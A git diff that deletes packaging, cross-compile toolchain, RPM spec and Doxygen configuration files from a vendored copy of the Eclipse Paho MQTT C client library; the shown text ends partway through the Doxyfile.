-    SET(CPACK_DEBIAN_PACKAGE_DESCRIPTION "Eclipse Paho MQTT C client library")
-    SET(CPACK_DEBIAN_PACKAGE_SHLIBDEPS ON)
-    SET(CPACK_DEBIAN_PACKAGE_VERSION ${PACKAGE_VERSION})
-    SET(CPACK_DEBIAN_PACKAGE_SECTION "net")
-    SET(CPACK_DEBIAN_PACKAGE_CONFLICTS ${CPACK_PACKAGE_NAME})
-    SET(CPACK_PACKAGE_FILE_NAME
-        "${CPACK_DEBIAN_PACKAGE_NAME}_${CPACK_DEBIAN_PACKAGE_VERSION}_${CPACK_DEBIAN_PACKAGE_ARCHITECTURE}")
-    IF(PAHO_WITH_SSL)
-      SET(CPACK_DEBIAN_PACKAGE_DEPENDS "libssl-dev")
-    ENDIF()
-
-    UNSET(PACKAGE_VERSION CACHE)
-    UNSET(CPACK_DEBIAN_PACKAGE_VERSION CACHE)
-
-    #
-    # From CMakeDebHelper
-    # See http://www.cmake.org/Wiki/CMake:CPackPackageGenerators#Overall_usage_.28common_to_all_generators.29
-    #
-
-    # When the DEB-generator runs, we want him to run our install-script
-    #set( CPACK_INSTALL_SCRIPT ${CPACK_DEBIAN_INSTALL_SCRIPT} )
-
-ENDIF()
diff --git a/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelper.cmake b/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelper.cmake
deleted file mode 100644
index 3dd9572..0000000
--- a/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelper.cmake
+++ /dev/null
@@ -1,74 +0,0 @@
-#=============================================================================
-# CMakeDebHelper, Copyright (C) 2013 Sebastian Kienzl
-# http://knzl.de/cmake-debhelper/
-# Licensed under the GPL v2, see LICENSE
-#=============================================================================
-
-# configure() .in-files to the CURRENT_BINARY_DIR
-foreach( _F ${DH_INPUT} )
-    # strip the .in part
-    string( REGEX REPLACE ".in$" "" _F_WE ${_F} )
-    configure_file( ${_F} ${_F_WE} @ONLY )
-endforeach()
-
-# compat and control is only needed for running the debhelpers,
-# CMake is going to make up the one that ends up in the deb.
-file( WRITE ${CMAKE_CURRENT_BINARY_DIR}/compat "9" )
-if( NOT CPACK_DEBIAN_PACKAGE_NAME )
-    string( TOLOWER "${CPACK_PACKAGE_NAME}" CPACK_DEBIAN_PACKAGE_NAME )
-endif()
-file( WRITE ${CMAKE_CURRENT_BINARY_DIR}/control "Package: ${CPACK_DEBIAN_PACKAGE_NAME}\nArchitecture: any\n" )
-
-# Some debhelpers need fakeroot, we use it for all of them
-find_program( FAKEROOT fakeroot )
-if( NOT FAKEROOT )
-    message( SEND_ERROR "fakeroot not found, please install" )
-endif()
-
-find_program( DEBHELPER dh_prep )
-if( NOT DEBHELPER )
-    message( SEND_ERROR "debhelper not found, please install" )
-endif()
-
-# Compose a string with a semicolon-seperated list of debhelpers
-foreach( _DH ${DH_RUN} )
-    set( _DH_RUN_SC_LIST "${_DH_RUN_SC_LIST} ${_DH} ;" )
-endforeach()
-
-# Making sure the debhelpers run each time we change one of ${DH_INPUT}
-add_custom_command(
-    OUTPUT dhtimestamp
-
-    # dh_prep is needed to clean up, dh_* aren't idempotent
-    COMMAND ${FAKEROOT} dh_prep
-    
-    # I haven't found another way to run a list of commands here
-    COMMAND ${FAKEROOT} -- sh -c "${_DH_RUN_SC_LIST}"
-    
-    # needed to create the files we'll use  
-    COMMAND ${FAKEROOT} dh_installdeb
-
-    COMMAND touch ${CMAKE_CURRENT_BINARY_DIR}/dhtimestamp
-    WORKING_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/..
-    DEPENDS ${DH_INPUT}
-    COMMENT "Running debhelpers"
-    VERBATIM
-)
-
-add_custom_target( dhtarget ALL
-    DEPENDS dhtimestamp
-)
-
-# these files are generated by debhelpers from our templates
-foreach( _F ${DH_GENERATED_CONTROL_EXTRA} )
-    set( CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA
-            ${CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA} 
-            ${CMAKE_CURRENT_BINARY_DIR}/${CPACK_DEBIAN_PACKAGE_NAME}/DEBIAN/${_F}
-            CACHE INTERNAL ""
-    )
-endforeach()
-
-# This will copy the generated dhhelper-files to our to-be-cpacked-directory.
-# CPACK_INSTALL_SCRIPT must be set to the value of CPACK_DEBIAN_INSTALL_SCRIPT in the file
-# pointed to by CPACK_PROJECT_CONFIG_FILE.
-set( CPACK_DEBIAN_INSTALL_SCRIPT ${CMAKE_CURRENT_LIST_DIR}/CMakeDebHelperInstall.cmake CACHE INTERNAL "" )
diff --git a/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelperInstall.cmake b/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelperInstall.cmake
deleted file mode 100644
index 7e61b32..0000000
--- a/thirdparty/paho.mqtt.c/cmake/modules/CMakeDebHelperInstall.cmake
+++ /dev/null
@@ -1,17 +0,0 @@
-# This script is used internally by CMakeDebHelper.
-# It is run at CPack-Time and copies the files generated by the debhelpers to the right place.
-
-if( NOT CPACK_DEBIAN_PACKAGE_NAME )
-    string( TOLOWER "${CPACK_PACKAGE_NAME}" CPACK_DEBIAN_PACKAGE_NAME )
-endif()
-
-# Copy all generated files where the packing will happen,
-# exclude the DEBIAN-directory.
-
-MESSAGE(STATUS "CPACK_OUTPUT_FILE_PREFIX: " "${CPACK_OUTPUT_FILE_PREFIX}/debian/${CPACK_DEBIAN_PACKAGE_NAME}/")
-
-file( COPY
-    "${CPACK_OUTPUT_FILE_PREFIX}/debian/${CPACK_DEBIAN_PACKAGE_NAME}/"
-    DESTINATION "${CMAKE_CURRENT_BINARY_DIR}" 
-    PATTERN DEBIAN EXCLUDE
-)
diff --git a/thirdparty/paho.mqtt.c/cmake/toolchain.linux-arm11.cmake b/thirdparty/paho.mqtt.c/cmake/toolchain.linux-arm11.cmake
deleted file mode 100644
index 4965ff7..0000000
--- a/thirdparty/paho.mqtt.c/cmake/toolchain.linux-arm11.cmake
+++ /dev/null
@@ -1,10 +0,0 @@
-# path to compiler and utilities
-# specify the cross compiler
-SET(CMAKE_C_COMPILER arm-linux-gnueabihf-gcc)
-
-# Name of the target platform
-SET(CMAKE_SYSTEM_NAME Linux)
-SET(CMAKE_SYSTEM_PROCESSOR arm)
-
-# Version of the system
-SET(CMAKE_SYSTEM_VERSION 1)
diff --git a/thirdparty/paho.mqtt.c/cmake/toolchain.win32.cmake b/thirdparty/paho.mqtt.c/cmake/toolchain.win32.cmake
deleted file mode 100644
index 05e7254..0000000
--- a/thirdparty/paho.mqtt.c/cmake/toolchain.win32.cmake
+++ /dev/null
@@ -1,15 +0,0 @@
-# Name of the target platform
-SET(CMAKE_SYSTEM_NAME Windows)
-
-# Version of the system
-SET(CMAKE_SYSTEM_VERSION 1)
-
-# specify the cross compiler
-SET(CMAKE_C_COMPILER i686-w64-mingw32-gcc)
-SET(CMAKE_CXX_COMPILER i686-w64-mingw32-g++)
-SET(CMAKE_RC_COMPILER_ENV_VAR "RC")
-SET(CMAKE_RC_COMPILER "")
-SET(CMAKE_SHARED_LINKER_FLAGS
-    "-fdata-sections -ffunction-sections -Wl,--enable-stdcall-fixup -static-libgcc -static -lpthread" CACHE STRING "" FORCE)
-SET(CMAKE_EXE_LINKER_FLAGS
-    "-fdata-sections -ffunction-sections -Wl,--enable-stdcall-fixup -static-libgcc -static -lpthread" CACHE STRING "" FORCE)
diff --git a/thirdparty/paho.mqtt.c/cmake/toolchain.win64.cmake b/thirdparty/paho.mqtt.c/cmake/toolchain.win64.cmake
deleted file mode 100644
index 98afef1..0000000
--- a/thirdparty/paho.mqtt.c/cmake/toolchain.win64.cmake
+++ /dev/null
@@ -1,15 +0,0 @@
-# Name of the target platform
-SET(CMAKE_SYSTEM_NAME Windows)
-
-# Version of the system
-SET(CMAKE_SYSTEM_VERSION 1)
-
-# specify the cross compiler
-SET(CMAKE_C_COMPILER x86_64-w64-mingw32-gcc)
-SET(CMAKE_CXX_COMPILER x86_64-w64-mingw32-g++)
-SET(CMAKE_RC_COMPILER_ENV_VAR "RC")
-SET(CMAKE_RC_COMPILER "")
-SET(CMAKE_SHARED_LINKER_FLAGS
-    "-fdata-sections -ffunction-sections -Wl,--enable-stdcall-fixup -static-libgcc -static -lpthread" CACHE STRING "" FORCE)
-SET(CMAKE_EXE_LINKER_FLAGS
-    "-fdata-sections -ffunction-sections -Wl,--enable-stdcall-fixup -static-libgcc -static -lpthread" CACHE STRING "" FORCE)
diff --git a/thirdparty/paho.mqtt.c/debian/CMakeLists.txt b/thirdparty/paho.mqtt.c/debian/CMakeLists.txt
deleted file mode 100644
index 7b315b8..0000000
--- a/thirdparty/paho.mqtt.c/debian/CMakeLists.txt
+++ /dev/null
@@ -1,16 +0,0 @@
-# These files (generated by dhelpers) will be copied into the control-part of the deb.
-# Files that end up in the filesystem normally (e.g. cron/init-scripts) must not be mentioned here.
-# It's a good idea to add "conffiles", as the debhelpers may generate it.
-set( DH_GENERATED_CONTROL_EXTRA
-    preinst
-        postinst
-        postrm
-        prerm
-        conffiles
-)
-
-# At this point, CMakeDebHelper must be included (add .cmake if you have it in this directory)
-
-include( CMakeDebHelper )
-
-# CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA and CPACK_INSTALL_SCRIPT are set now, don't modify them!
diff --git a/thirdparty/paho.mqtt.c/dist/Makefile b/thirdparty/paho.mqtt.c/dist/Makefile
deleted file mode 100644
index 88d9c3d..0000000
--- a/thirdparty/paho.mqtt.c/dist/Makefile
+++ /dev/null
@@ -1,11 +0,0 @@
-VERSION=1.2.0
-
-check:
-	rpmlint -i dist/paho-c.spec
-
-rpm-prep:
-	mkdir -p ${HOME}/rpmbuild/SOURCES/
-	tar --transform="s/\./paho-c-${VERSION}/" -cf ${HOME}/rpmbuild/SOURCES/v${VERSION}.tar.gz --exclude=./build.paho --exclude=.git --exclude=*.bz ./ --gzip
-
-rpm: rpm-prep
-	rpmbuild -ba dist/paho-c.spec
diff --git a/thirdparty/paho.mqtt.c/dist/paho-c.spec b/thirdparty/paho.mqtt.c/dist/paho-c.spec
deleted file mode 100644
index 9314349..0000000
--- a/thirdparty/paho.mqtt.c/dist/paho-c.spec
+++ /dev/null
@@ -1,78 +0,0 @@
-Summary:            MQTT C Client
-Name:               paho-c
-Version:            1.2.0
-Release:            3%{?dist}
-License:            Eclipse Distribution License 1.0 and Eclipse Public License 1.0
-Group:              Development/Tools
-Source:             https://github.com/eclipse/paho.mqtt.c/archive/v%{version}.tar.gz
-URL:                https://eclipse.org/paho/clients/c/
-BuildRequires:      cmake
-BuildRequires:      gcc
-BuildRequires:      graphviz
-BuildRequires:      doxygen
-BuildRequires:      openssl-devel
-Requires:           openssl
-
-
-%description
-The Paho MQTT C Client is a fully fledged MQTT client written in ANSI standard C.
-
-
-%package devel
-Summary:            MQTT C Client development kit
-Group:              Development/Libraries
-Requires:           paho-c
-
-%description devel
-Development files and samples for the the Paho MQTT C Client.
-
-
-%package devel-docs
-Summary:            MQTT C Client development kit documentation
-Group:              Development/Libraries
-
-%description devel-docs
-Development documentation files for the the Paho MQTT C Client.
-
-%prep
-%autosetup -n paho-c-%{version}
-
-%build
-mkdir build.paho && cd build.paho
-%cmake -DPAHO_WITH_SSL=TRUE -DPAHO_BUILD_DOCUMENTATION=TRUE -DPAHO_BUILD_SAMPLES=TRUE ..
-make %{?_smp_mflags}
-
-%install
-cd build.paho
-make install DESTDIR=%{buildroot}
-
-%files
-%doc edl-v10 epl-v10
-%{_libdir}/*
-
-%files devel
-%{_bindir}/*
-%{_includedir}/*
-
-%files devel-docs
-%{_datadir}/*
-
-%changelog
-* Thu Jul 27 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0-4
-- Enabled generation of debuginfo package
-
-* Thu Jul 27 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0-3
-- Fixed changelog issues pointed by rpmlint
-
-* Thu Jul 27 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0-2
-- Updated changelog to comply with Fedora packaging guidelines
-
-* Wed Jul 26 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0-1
-- Fixed rpmlint warnings: replaced cmake call with builtin macro
-- Fixed rpmlint warnings: removed buildroot reference from build section
-
-* Fri Jun 30 2017 Otavio R. Piske <opiske@redhat.com> - 1.2.0
-- Updated package to version 1.2.0
-
-* Sat Dec 31 2016 Otavio R. Piske <opiske@redhat.com> - 1.1.0
-- Initial packaging
diff --git a/thirdparty/paho.mqtt.c/doc/CMakeLists.txt b/thirdparty/paho.mqtt.c/doc/CMakeLists.txt
deleted file mode 100644
index 06e4c5d..0000000
--- a/thirdparty/paho.mqtt.c/doc/CMakeLists.txt
+++ /dev/null
@@ -1,40 +0,0 @@
-#*******************************************************************************
-#  Copyright (c) 2015 logi.cals GmbH
-# 
-#  All rights reserved. This program and the accompanying materials
-#  are made available under the terms of the Eclipse Public License v1.0
-#  and Eclipse Distribution License v1.0 which accompany this distribution. 
-# 
-#  The Eclipse Public License is available at 
-#     http://www.eclipse.org/legal/epl-v10.html
-#  and the Eclipse Distribution License is available at 
-#    http://www.eclipse.org/org/documents/edl-v10.php.
-# 
-#  Contributors:
-#     Rainer Poisel - initial version
-#*******************************************************************************/
-
-# Note: on OS X you should install XCode and the associated command-line tools
-
-### documentation settings
-FIND_PACKAGE(Doxygen)
-IF(NOT DOXYGEN_FOUND)
-    message(FATAL_ERROR "Doxygen is needed to build the documentation.")
-ENDIF()
-SET(DOXYTARGETS)
-FILE(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/doc)
-FOREACH(DOXYFILE_SRC DoxyfileV3ClientAPI;DoxyfileV3AsyncAPI;DoxyfileV3ClientInternal)
-    SET(DOXYFILE_IN ${DOXYFILE_SRC}.in)
-    SET(DOXYFILE ${CMAKE_CURRENT_BINARY_DIR}/${DOXYFILE_SRC})
-
-    CONFIGURE_FILE(${DOXYFILE_IN} ${DOXYFILE} @ONLY)
-    ADD_CUSTOM_TARGET(${DOXYFILE_SRC}.target
-        COMMAND ${DOXYGEN_EXECUTABLE} ${DOXYFILE}
-            WORKING_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}
-            COMMENT "Generating API documentation with Doxygen"
-            VERBATIM
-    )
-    SET(DOXYTARGETS ${DOXYTARGETS} ${DOXYFILE_SRC}.target)
-ENDFOREACH(DOXYFILE_SRC)
-ADD_CUSTOM_TARGET(doc ALL DEPENDS ${DOXYTARGETS})
-INSTALL(DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/doc DESTINATION share)
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI b/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI
deleted file mode 100644
index 91aea10..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI
+++ /dev/null
@@ -1,1803 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "Paho Asynchronous MQTT C Client Library"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "../doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "../build/output/doc/MQTTAsync/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = /Users/dimitri/doxygen/mail/1.5.7/doxywizard/
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = NO
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = YES
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = NO
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = NO
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
